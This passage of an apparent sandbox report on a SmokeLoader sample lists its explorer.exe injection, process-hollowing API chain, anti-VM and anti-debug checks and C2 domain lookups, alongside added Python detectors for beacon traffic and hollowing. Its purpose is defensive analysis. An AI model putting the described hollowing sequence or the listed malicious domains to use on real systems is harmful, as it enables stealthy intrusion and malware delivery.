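    b"Accept: text/html\r\n"
    b"Accept-Language: en-US\r\n"
    b"Accept-Encoding: gzip, deflate\r\n"
    b"Referer: https://example.com/\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\n"
    b"Content-Length: 27\r\n\r\n"
    b"user=alice&password=secret1"
)
BENIGN_RESP = (
    b"HTTP/1.1 404 Not Found\r\n"
    b"Content-Type: text/html; charset=iso-8859-1\r\n"
    b"Content-Length: 54\r\n\r\n"
    b"<html><head><title>404 Not Found</title></head></html>"
)

# Bytes that can legitimately appear in an application/x-www-form-urlencoded body.
FORM_BYTES = frozenset(b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-._~%+&=*!'()")


def parse_http(raw: bytes):
    """Split a raw HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return lines[0], headers, body


def dechunk(body: bytes) -> bytes:
    """Decode a chunked transfer-encoded body (no trailers expected)."""
    out, pos = b"", 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";")[0].decode(), 16)
        if size == 0:
            return out
        pos = end + 2
        out += body[pos:pos + size]
        pos += size + 2             # skip the CRLF that follows the chunk data


def score_request(raw: bytes) -> list:
    start, h, body = parse_http(raw)
    method, target, _ = start.split(" ", 2)
    host = h.get("host", "").split(":")[0].lower()
    reasons = []
    if method == "POST" and target == "/":
        reasons.append("POST to bare root path")
    if h.get("content-type", "").startswith("application/x-www-form-urlencoded") \
            and body and any(b not in FORM_BYTES for b in body):
        reasons.append("form-urlencoded Content-Type but body contains raw binary")
    ref_host = (urlsplit(h.get("referer", "")).hostname or "").lower()
    if ref_host and ref_host != host:
        reasons.append(f"Referer host {ref_host} unrelated to Host {host}")
    if "Trident/7.0" in h.get("user-agent", "") and not ({"accept-language", "accept-encoding"} & h.keys()):
        reasons.append("browser User-Agent without Accept-Language/Accept-Encoding")
    return reasons


def score_response(raw: bytes) -> list:
    start, h, body = parse_http(raw)
    if h.get("transfer-encoding", "").lower() == "chunked":
        body = dechunk(body)
    status = start.split(" ")[1]
    reasons = []
    if h.get("content-type", "").startswith("text/html") and body and not body.lstrip().startswith(b"<"):
        reasons.append(f"{status} reply declares text/html but carries {len(body)} bytes of non-HTML data")
    return reasons


def classify(req: bytes, resp: bytes):
    reasons = score_request(req) + score_response(resp)
    return ("beacon-like" if len(reasons) >= 3 else "benign"), reasons


if __name__ == "__main__":
    for label, pair in (("C2 exchange", (BEACON_REQ, BEACON_RESP)), ("login form", (BENIGN_REQ, BENIGN_RESP))):
        verdict, why = classify(*pair)
        print(f"{label}: {verdict}")
        for r in why:
            print("  -", r)
```

The 404 check is the part most often missed: a C2 that hides its replies in error pages defeats any rule that only looks at 200 responses, but the declared text/html type and the non-HTML bytes still contradict each other.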

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            Yara detected SmokeLoader
            Source: Yara match | File source: 00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.765681019.0000000000640000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000000.748566688.0000000004F01000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.834484758.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.765917923.0000000002051000.00000004.00020000.sdmp, type: MEMORY
            Source: D380.exe, 00000004.00000002.820813732.0000000001F09000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_2_00401813 Sleep,NtTerminateProcess,1_2_00401813
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_2_00401842 Sleep,NtTerminateProcess,1_2_00401842
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_2_00402052 NtQuerySystemInformation,NtQuerySystemInformation,1_2_00402052
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_2_00402403 NtEnumerateKey,NtEnumerateKey,1_2_00402403
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_2_00401812 Sleep,NtTerminateProcess,1_2_00401812
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_2_0040202C NtQuerySystemInformation,NtQuerySystemInformation,1_2_0040202C
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_2_00401830 Sleep,NtTerminateProcess,1_2_00401830
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_2_00401833 Sleep,NtTerminateProcess,1_2_00401833
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_2_00401836 Sleep,NtTerminateProcess,1_2_00401836
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_2_004023D9 NtEnumerateKey,1_2_004023D9
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_1_00402052 NtQuerySystemInformation,NtQuerySystemInformation,1_1_00402052
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_1_004023D9 NtEnumerateKey,1_1_004023D9
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_1_00402403 NtEnumerateKey,NtEnumerateKey,1_1_00402403
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_1_0040202C NtQuerySystemInformation,NtQuerySystemInformation,1_1_0040202C
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 4_2_01D20110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,4_2_01D20110
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Code function: 5_2_00401813 Sleep,NtTerminateProcess,5_2_00401813
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Code function: 5_2_00401842 Sleep,NtTerminateProcess,5_2_00401842
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Code function: 5_2_00402052 NtQuerySystemInformation,NtQuerySystemInformation,5_2_00402052
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Code function: 5_2_00402403 NtEnumerateKey,NtEnumerateKey,5_2_00402403
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Code function: 5_2_00401812 Sleep,NtTerminateProcess,5_2_00401812
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Code function: 5_2_0040202C NtQuerySystemInformation,NtQuerySystemInformation,5_2_0040202C
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Code function: 5_2_00401830 Sleep,NtTerminateProcess,5_2_00401830
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Code function: 5_2_00401833 Sleep,NtTerminateProcess,5_2_00401833
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Code function: 5_2_00401836 Sleep,NtTerminateProcess,5_2_00401836
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Code function: 5_2_004023D9 NtEnumerateKey,5_2_004023D9
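The D380.exe call chain listed above (GetModuleFileNameA, CreateProcessA, GetThreadContext, ReadProcessMemory, NtUnmapViewOfSection, VirtualAllocEx, NtWriteVirtualMemory, WriteProcessMemory, SetThreadContext, ResumeThread) is the textbook process-hollowing sequence: spawn a copy of yourself suspended, unmap its image, write a new one in, point the main thread at it, and resume. The following added example, which is not from the report or from Joe Sandbox, walks an ordered API trace per process and reports a chain only when a suspended spawn is followed by memory writes, a thread-context change and a resume aimed at that same child; a suspended spawn that is simply resumed, as a debugger or an installer would do, is not reported. The trace format, the PIDs and the argument fields are constructed for the example; the API names are those in the report plus their Nt-level equivalents.

```python
# Constructed API trace, one call per line: "<pid> <api> key=value ...".
# Process 6328 follows the chain the report lists for D380.exe; 4100 and 5000
# are invented controls (a plain spawn, and a suspended spawn merely resumed).
TRACE = r"""
6328 VirtualAlloc size=0x3000
6328 GetModuleFileNameA path=C:\Users\user\AppData\Local\Temp\D380.exe
6328 CreateProcessA image=C:\Users\user\AppData\Local\Temp\D380.exe flags=0x4 child=5456
6328 VirtualFree
6328 VirtualAlloc size=0x31000
6328 GetThreadContext target=5456
6328 ReadProcessMemory target=5456 addr=0x400000
6328 NtUnmapViewOfSection target=5456 base=0x400000
6328 VirtualAllocEx target=5456 addr=0x400000 size=0x31000
6328 NtWriteVirtualMemory target=5456 addr=0x400000
6328 NtWriteVirtualMemory target=5456 addr=0x401000
6328 WriteProcessMemory target=5456 addr=0x7ffde008
6328 SetThreadContext target=5456
6328 ResumeThread target=5456
6328 ExitProcess
4100 CreateProcessA image=C:\Windows\System32\notepad.exe flags=0x0 child=4120
4100 WaitForSingleObject target=4120
5000 CreateProcessW image=C:\Tools\app.exe flags=0x4 child=5010
5000 ResumeThread target=5010
"""

CREATE_SUSPENDED = 0x4

STAGES = {
    "spawn":   {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"},
    "unmap":   {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"},
    "alloc":   {"VirtualAllocEx", "NtAllocateVirtualMemory"},
    "write":   {"WriteProcessMemory", "NtWriteVirtualMemory"},
    "context": {"SetThreadContext", "NtSetContextThread", "Wow64SetThreadContext"},
    "resume":  {"ResumeThread", "NtResumeThread"},
}
REQUIRED = ("spawn", "write", "context", "resume")   # unmap/alloc vary between variants


def parse_trace(text: str) -> list:
    """Return [(pid, api, {arg: value})] in trace order."""
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, api, *kv = line.split()
        calls.append((int(pid), api, dict(p.split("=", 1) for p in kv)))
    return calls


def stage_of(api: str):
    return next((s for s, names in STAGES.items() if api in names), None)


def detect_hollowing(calls: list) -> list:
    """One finding per completed spawn-write-context-resume chain against a suspended child."""
    by_pid = {}
    for pid, api, args in calls:
        by_pid.setdefault(pid, []).append((api, args))
    findings = []
    for pid, seq in by_pid.items():
        own_path, child, image, seen = None, None, None, []
        for api, args in seq:
            if api == "GetModuleFileNameA":
                own_path = args.get("path")         # remembered to spot self-spawning
            stage = stage_of(api)
            if stage is None:
                continue
            if stage == "spawn":
                # A chain only starts with a child created in suspended state.
                if int(args.get("flags", "0"), 16) & CREATE_SUSPENDED:
                    child, image, seen = args.get("child"), args.get("image"), ["spawn"]
                continue
            if child is None or args.get("target") != child:
                continue          # cross-process calls must hit the suspended child
            if stage not in seen:
                seen.append(stage)
            if stage == "resume":
                if all(s in seen for s in REQUIRED):
                    findings.append({"pid": pid, "child": int(child), "image": image,
                                     "stages": seen, "self_spawn": image == own_path})
                child, image, seen = None, None, []   # resume closes the window
    return findings


if __name__ == "__main__":
    for f in detect_hollowing(parse_trace(TRACE)):
        print(f"PID {f['pid']} hollowed child {f['child']} ({f['image']}) "
              f"stages={'>'.join(f['stages'])} self_spawn={f['self_spawn']}")
```

Keying every cross-process call on the child PID from the suspended spawn is what keeps the false-positive rate down: writes and context changes to any other process, or a resume without prior writes, never complete the chain.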
            Source: qhQ6armJ25.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: qhQ6armJ25.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: D380.exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: D380.exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: gahfeaj.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: gahfeaj.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Windows\explorer.exe | Section loaded: taskschd.dll
            Source: C:\Windows\explorer.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\explorer.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\explorer.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exe | Section loaded: webio.dll
            Source: C:\Windows\explorer.exe | Section loaded: mswsock.dll
            Source: C:\Windows\explorer.exe | Section loaded: winnsi.dll
            Source: qhQ6armJ25.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown | Process created: C:\Users\user\Desktop\qhQ6armJ25.exe "C:\Users\user\Desktop\qhQ6armJ25.exe"
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Process created: C:\Users\user\Desktop\qhQ6armJ25.exe "C:\Users\user\Desktop\qhQ6armJ25.exe"
            Source: unknown | Process created: C:\Users\user\AppData\Roaming\gahfeaj C:\Users\user\AppData\Roaming\gahfeaj
            Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exe
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Process created: C:\Users\user\AppData\Roaming\gahfeaj C:\Users\user\AppData\Roaming\gahfeaj
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Process created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exe
            Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
            Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\gahfeaj
            Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\D380.tmp
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@10/3@10/1
            Source: qhQ6armJ25.exe | Static PE information: More than 200 imports for KERNEL32.dll
            Source: qhQ6armJ25.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: qhQ6armJ25.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: qhQ6armJ25.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: qhQ6armJ25.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: qhQ6armJ25.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: qhQ6armJ25.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: qhQ6armJ25.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_2_004025F7 pushad ; iretd 1_2_004025FA
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_2_004029A6 push eax; ret 1_2_004029AE
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_1_004025F7 pushad ; iretd 1_1_004025FA
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_1_004029A6 push eax; ret 1_1_004029AE
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 4_2_01D23146 push eax; ret 4_2_01D2314E
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 4_2_01D22D97 pushad ; iretd 4_2_01D22D9A
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 4_2_01F24733 push ebp; ret 4_2_01F24734
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 4_2_01F1FB3B pushad ; iretd 4_2_01F1FB4B
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 4_2_01F24210 push edi; ret 4_2_01F24239
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Code function: 5_2_004025F7 pushad ; iretd 5_2_004025FA
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Code function: 5_2_004029A6 push eax; ret 5_2_004029AE
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 6_2_004025F7 pushad ; iretd 6_2_004025FA
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 6_2_004029A6 push eax; ret 6_2_004029AE
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 6_1_004025F7 pushad ; iretd 6_1_004025FA
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 0_2_00420500 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00420500
            Source: initial sample | Static PE information: section name: .text entropy: 7.04028491917
            Source: initial sample | Static PE information: section name: .text entropy: 7.02591971436
            Source: initial sample | Static PE information: section name: .text entropy: 7.04028491917
            Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\gahfeaj
            Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\D380.exe
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gahfeajJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            Deletes itself after installation
            Source: C:\Windows\explorer.exe | File deleted: c:\users\user\desktop\qhq6armj25.exe
            Hides that the sample has been downloaded from the Internet (zone.identifier)
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\gahfeaj:Zone.Identifier read attributes | delete

            Malware Analysis System Evasion:

            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: qhQ6armJ25.exe, 00000001.00000002.765854041.0000000001F40000.00000004.00000001.sdmp | Binary or memory string: ASWHOOK
            Checks if the current machine is a virtual machine (disk enumeration)
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (6 identical entries)
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (6 identical entries)
            Source: C:\Windows\explorer.exe TID: 2936 | Thread sleep count: 615 > 30
            Source: C:\Windows\explorer.exe TID: 1316 | Thread sleep count: 385 > 30
            Source: C:\Windows\explorer.exe TID: 1316 | Thread sleep time: -38500s >= -30000s
            Source: C:\Windows\explorer.exe TID: 3080 | Thread sleep count: 462 > 30
            Source: C:\Windows\explorer.exe TID: 3080 | Thread sleep time: -46200s >= -30000s
            Source: C:\Windows\explorer.exe TID: 6360 | Thread sleep count: 439 > 30
            Source: C:\Windows\explorer.exe TID: 660 | Thread sleep count: 281 > 30
            Source: C:\Windows\explorer.exe TID: 6364 | Thread sleep count: 282 > 30
            Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 615
            Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 385
            Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 462
            Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 439
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | System information queried: ModuleInformation
            Source: explorer.exe, 00000002.00000000.723940814.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATAY
            Source: explorer.exe, 00000002.00000000.749875732.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000002.00000000.723940814.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATAa
            Source: explorer.exe, 00000002.00000000.732593679.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
            Source: explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
            Source: explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@

            Anti Debugging:

            Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | System information queried: CodeIntegrityInformation
            Source: C:\Users\user\AppData\Roaming\gahfeaj | System information queried: CodeIntegrityInformation
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 0_2_004202D0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_004202D0
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 0_2_00420500 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00420500
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 4_2_01D20042 push dword ptr fs:[00000030h] 4_2_01D20042
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 4_2_01F1D6AA push dword ptr fs:[00000030h] 4_2_01F1D6AA
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Process queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Process queried: DebugPort
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 6_1_00402679 LdrLoadDll, 6_1_00402679
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 0_2_004202D0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_004202D0
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 0_2_0041E390 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041E390
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 4_2_0041FDD0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_0041FDD0
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 4_2_0041DE90 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_0041DE90

            HIPS / PFW / Operating System Protection Evasion:

            Benign windows process drops PE files
            Source: C:\Windows\explorer.exe | File created: gahfeaj.2.dr
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exe | Domain query: nalirou70.top
            Source: C:\Windows\explorer.exe | Domain query: privacytoolzfor-you7000.top
            Source: C:\Windows\explorer.exe | Domain query: xacokuo80.top
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
            Injects a PE file into a foreign process
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Memory written: C:\Users\user\AppData\Local\Temp\D380.exe base: 400000 value starts with: 4D5A
            Contains functionality to inject code into remote processes
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 4_2_01D20110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 4_2_01D20110
            Creates a thread in another existing process (thread injection)
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Thread created: C:\Windows\explorer.exe EIP: 4F01920
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Thread created: unknown EIP: 3151920
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Process created: C:\Users\user\Desktop\qhQ6armJ25.exe "C:\Users\user\Desktop\qhQ6armJ25.exe"
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Process created: C:\Users\user\AppData\Roaming\gahfeaj C:\Users\user\AppData\Roaming\gahfeaj
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Process created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exe
            Source: explorer.exe, 00000002.00000000.712673606.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.731425992.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.745782073.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
            Source: explorer.exe, 00000002.00000000.731701488.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.745995087.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.714471440.0000000001080000.00000002.00020000.sdmp | Binary or memory string: Program Manager
            Source: explorer.exe, 00000002.00000000.731701488.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.749862534.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.745995087.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.714471440.0000000001080000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000002.00000000.731701488.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.745995087.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.714471440.0000000001080000.00000002.00020000.sdmp | Binary or memory string: Progman
            Source: explorer.exe, 00000002.00000000.731701488.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.745995087.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.714471440.0000000001080000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
            Source: explorer.exe, 00000002.00000000.738660675.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.759191918.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd5D
            Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 0_2_00418430 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00418430

            Stealing of Sensitive Information:

            Yara detected SmokeLoader
            Source: Yara match | File source: 00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.765681019.0000000000640000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000000.748566688.0000000004F01000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.834484758.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.765917923.0000000002051000.00000004.00020000.sdmp, type: MEMORY

            Remote Access Functionality:

            Yara detected SmokeLoader
            Source: Yara match | File source: 00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.765681019.0000000000640000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000000.748566688.0000000004F01000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.834484758.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.765917923.0000000002051000.00000004.00020000.sdmp, type: MEMORY

            Mitre Att&ck Matrix (numbers after a technique are the report's signature counts for that technique; an empty cell means no technique listed in that row)

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Native API 1 | DLL Side-Loading 1 | Process Injection 512 | Masquerading 11 | Input Capture 1 | System Time Discovery 1 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 13 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
